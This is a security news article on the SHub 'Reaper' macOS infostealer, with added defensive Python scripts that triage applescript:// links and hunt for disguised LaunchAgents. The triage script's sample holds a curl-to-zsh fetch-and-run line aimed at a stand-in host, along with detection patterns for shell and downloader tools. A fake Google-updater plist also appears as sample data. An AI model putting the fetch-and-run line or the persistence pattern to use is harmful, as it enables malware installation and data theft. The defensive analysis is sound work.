Introduction to SHub macOS Infostealer
A new variant of the SHub macOS infostealer, dubbed Reaper, has been identified by SentinelOne researchers. The malware uses AppleScript to display a fake Apple security update prompt, steals browser data, collects documents and other files, hijacks cryptocurrency wallet apps, and installs a backdoor that gives the operator remote access to the infected Mac.
How SHub Reaper Works
The Reaper variant abuses the applescript:// URL scheme to open the macOS Script Editor with a malicious AppleScript already loaded, sidestepping the Terminal-focused mitigations Apple introduced in late March with macOS Tahoe 26.4. The malware is distributed through fake installers for the WeChat and Miro applications, hosted on lookalike domains made to appear legitimate.
Before invoking the AppleScript, the malicious sites fingerprint the visitor's device, checking for virtual machines and VPNs and enumerating installed browser extensions for password managers and cryptocurrency wallets. All of this telemetry is relayed to the attacker through a Telegram bot.
Technical Details of SHub Reaper
The command that fetches the payload is assembled dynamically at runtime and buried beneath ASCII art, so the visible part of the script looks harmless. When the victim clicks 'Run', the script displays a fake Apple security update message that references XProtectRemediator, downloads a shell script with curl, and executes it silently via zsh.
The malware then checks whether the victim uses a Russian keyboard layout or input source. If it finds one, it reports a 'cis_blocked' event to the command-and-control (C2) server and exits without infecting the system. Otherwise, Reaper retrieves the malicious AppleScript containing the data-theft routine and executes it with osascript, the command-line tool built into macOS.
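The applescript:// handoff and the ASCII-art-padded curl-to-zsh script described in the two sections above, as an added triage example (this is not code from the SentinelOne report or from BleepingComputer): it pulls the script out of a Script Editor link and flags the constructs that matter. It assumes the link has the documented Script Editor form applescript://com.apple.scripteditor?action=new&script=<url-encoded AppleScript>; the sample link it builds is constructed for the demo and points at a reserved .invalid host, not at any real infrastructure.

```python
"""Triage an applescript:// link of the kind described above.

Added example, not code from the SentinelOne report or from BleepingComputer.
Assumptions: the link uses Script Editor's URL form
applescript://com.apple.scripteditor?action=new&script=<url-encoded AppleScript>,
and the sample URL built below is constructed for the demo (example.invalid host).
"""
import re
from urllib.parse import parse_qs, quote, urlparse

# Constructs that justify a closer look when a web page hands a script to Script Editor.
HIGH = {
    "shell_exec": re.compile(r"\bdo shell script\b", re.I),
    "downloader": re.compile(r"\b(curl|wget)\b", re.I),
    "interpreter": re.compile(r"\b(zsh|bash|osascript)\b", re.I),
}
LOW = {
    "dialog": re.compile(r"\bdisplay (dialog|alert)\b", re.I),
    "password_prompt": re.compile(r"\bwith hidden answer\b", re.I),
}
ART_LINE_THRESHOLD = 4  # this many symbol-only lines is decoration that pushes the payload out of view


def extract_script(url):
    """Return the AppleScript carried by an applescript:// URL, or None if it is not one."""
    parsed = urlparse(url)
    if parsed.scheme.lower() != "applescript" or parsed.netloc.lower() != "com.apple.scripteditor":
        return None
    params = parse_qs(parsed.query)  # parse_qs also URL-decodes the value
    return params.get("script", [None])[0]


def count_art_lines(script):
    """Lines that are mostly punctuation (banners, boxes, ASCII art) rather than code."""
    count = 0
    for line in script.splitlines():
        body = line.strip()
        if len(body) < 8:
            continue
        symbols = sum(1 for ch in body if not ch.isalnum() and not ch.isspace())
        if symbols / len(body) > 0.6:
            count += 1
    return count


def triage(url):
    """Classify a link: 'not_applescript', 'clean', 'review' (dialog/padding only) or 'suspicious'."""
    script = extract_script(url)
    if script is None:
        return {"script": None, "findings": [], "verdict": "not_applescript"}
    findings = [name for name, rx in HIGH.items() if rx.search(script)]
    findings += [name for name, rx in LOW.items() if rx.search(script)]
    if count_art_lines(script) >= ART_LINE_THRESHOLD:
        findings.append("ascii_art_padding")
    if any(name in HIGH for name in findings):
        verdict = "suspicious"
    elif findings:
        verdict = "review"
    else:
        verdict = "clean"
    return {"script": script, "findings": findings, "verdict": verdict}


# Constructed sample: a banner of symbol-only lines followed by a fake-update dialog and a
# curl|zsh one-liner. example.invalid is a reserved name, so nothing here resolves.
_ART = "\n".join("-- " + "#" * 40 for _ in range(6))
SAMPLE_SCRIPT = _ART + "\n" + (
    'display dialog "Apple security update required. Click Run to continue." buttons {"Run"}\n'
    'do shell script "curl -fsSL https://update.example.invalid/xpr.sh | zsh"\n'
)
SAMPLE_URL = "applescript://com.apple.scripteditor?action=new&script=" + quote(SAMPLE_SCRIPT, safe="")
BENIGN_URL = "applescript://com.apple.scripteditor?action=new&script=" + quote(
    'tell application "Finder" to get name of startup disk', safe="")

if __name__ == "__main__":
    for u in (SAMPLE_URL, BENIGN_URL, "https://example.invalid/"):
        r = triage(u)
        print(r["verdict"], r["findings"])
```

The rules are deliberately coarse: a link that drops into do shell script with curl and an interpreter is never what a legitimate page needs Script Editor for, and symbol-only banner lines are counted so that a payload pushed below a screenful of decoration still gets flagged. Opening such a link still launches Script Editor, so the point is to triage it from a proxy log or a phishing report without running it.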
Data Theft and Hijacking
Once running, the malware prompts the user for their macOS password, which it can then use to unlock Keychain items, decrypt stored credentials, and reach other protected data. The infostealer targets browser data from Google Chrome, Mozilla Firefox, Brave, Microsoft Edge, Opera, Vivaldi, Arc, and Orion, along with cryptocurrency wallet and password manager browser extensions.
A "Filegrabber" module searches the Desktop and Documents folders for file types likely to hold sensitive information and collects matching files smaller than 2MB (up to 6MB for PNG images), with a 150MB cap on the total volume collected.
Persistence and Remote Access
SHub Reaper establishes persistence by installing a script that impersonates Google's software updater and registering it as a LaunchAgent. The agent runs the script every minute; it acts as a beacon that sends system information to the C2, and if the C2 returns a payload, the script decodes it, executes it in the context of the current user, and then deletes the file, giving the attacker extended access to the machine.
SentinelOne warns that the SHub operator is extending the infostealer's capabilities toward remote access to compromised devices, which could be used to fetch additional malware. The researchers have published a set of indicators of compromise to help defenders detect activity associated with the new Reaper variant.
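The LaunchAgent persistence described above, and the corresponding advice in the conclusion to watch for new LaunchAgents in a trusted vendor's namespace, as an added hunting example that is not code from SentinelOne or BleepingComputer. It parses LaunchAgent plists and flags ones whose label borrows a vendor's reverse-DNS namespace while the program that actually runs lives outside that vendor's install path, runs under a shell interpreter, or fires on a beaconing interval. The expected Google updater path, the user name alice and both sample plists are assumptions constructed for the demo, not indicators from the report.

```python
"""Hunt for LaunchAgents that borrow a trusted vendor's namespace.

Added example, not code from the SentinelOne report or from BleepingComputer.
The Google updater install path, the user name "alice" and both sample plists
below are assumptions constructed for this demo, not indicators from the report.
"""
import os
import plistlib
import re

# Reverse-DNS label prefix -> path fragment the vendor's real agent binary lives under.
# Assumed for the demo: derive this table from a known-clean host before relying on it.
VENDOR_PATHS = {
    "com.google": re.compile(r"/Library/Google/GoogleSoftwareUpdate/"),
}
INTERPRETERS = {"zsh", "bash", "sh", "osascript", "python3", "python", "perl"}
SCRATCH_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")
BEACON_INTERVAL_MAX = 120  # seconds; a 60 s StartInterval is a beaconing cadence, not an updater's


def vendor_of(label):
    """'com.google.keystone.agent' -> 'com.google' (first two reverse-DNS components)."""
    parts = label.split(".")
    return ".".join(parts[:2]) if len(parts) >= 2 else label


def assess_launch_agent(plist_bytes):
    """Assess one LaunchAgent plist; returns the label, what really runs, findings and a verdict."""
    plist = plistlib.loads(plist_bytes)
    label = plist.get("Label", "")
    args = plist.get("ProgramArguments") or []
    program = plist.get("Program") or (args[0] if args else "")
    findings = []

    # If the program is an interpreter, the script it is handed is what must be judged.
    executable = program
    if os.path.basename(program) in INTERPRETERS:
        findings.append("script_interpreter")
        executable = next((a for a in args[1:] if not a.startswith("-")), program)

    expected = VENDOR_PATHS.get(vendor_of(label))
    if expected and not expected.search(executable):
        findings.append("vendor_namespace_mismatch")
    if executable.startswith(SCRATCH_DIRS) or "/." in executable:
        findings.append("unusual_location")  # scratch space or a dot-directory

    interval = plist.get("StartInterval")
    if isinstance(interval, int) and 0 < interval <= BEACON_INTERVAL_MAX:
        findings.append("high_frequency_beacon")
    if plist.get("RunAtLoad"):
        findings.append("run_at_load")

    if "vendor_namespace_mismatch" in findings and (
        "script_interpreter" in findings or "high_frequency_beacon" in findings
    ):
        verdict = "high"
    elif any(f in findings for f in ("vendor_namespace_mismatch", "script_interpreter", "unusual_location")):
        verdict = "medium"
    else:
        verdict = "low"
    return {"label": label, "program": executable, "findings": findings, "verdict": verdict}


def scan_launch_agents(directory=None):
    """Assess every .plist in a LaunchAgents directory and return the non-'low' ones."""
    directory = directory or os.path.expanduser("~/Library/LaunchAgents")
    hits = []
    if not os.path.isdir(directory):
        return hits
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        with open(os.path.join(directory, name), "rb") as fh:
            try:
                result = assess_launch_agent(fh.read())
            except Exception:  # unparsable plist: skip it rather than abort the sweep
                continue
        if result["verdict"] != "low":
            hits.append((name, result))
    return hits


# Constructed samples. LEGIT_AGENT mirrors how a real updater agent is laid out (assumed);
# FAKE_AGENT has the shape the report describes: vendor-looking label, shell script, 60 s beacon.
LEGIT_AGENT = plistlib.dumps({
    "Label": "com.google.keystone.agent",
    "ProgramArguments": [
        "/Users/alice/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/"
        "Contents/Helpers/GoogleSoftwareUpdateAgent.app/Contents/MacOS/GoogleSoftwareUpdateAgent",
    ],
    "StartInterval": 3600,
})
FAKE_AGENT = plistlib.dumps({
    "Label": "com.google.update.agent",
    "ProgramArguments": ["/bin/zsh", "/Users/alice/Library/Application Support/.google/update.sh"],
    "StartInterval": 60,
    "RunAtLoad": True,
})

if __name__ == "__main__":
    for sample in (LEGIT_AGENT, FAKE_AGENT):
        print(assess_launch_agent(sample))
    for name, result in scan_launch_agents():
        print(name, result["verdict"], result["findings"])
```

Run it against each user's ~/Library/LaunchAgents and pair the hits with the outbound-traffic monitoring the report recommends: a plist that scores high, appearing shortly after a process tree in which Script Editor or osascript spawned curl, is the sequence described above.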
Conclusion and Recommendations
SentinelOne recommends monitoring for suspicious outbound traffic following Script Editor execution, and for new LaunchAgents and related files that appear in the namespace of trusted vendors. The researchers also stress the importance of validating six surfaces against threats like this one, including whether controls block the threat, whether detection rules fire, and whether cloud configurations hold.
Source: BleepingComputer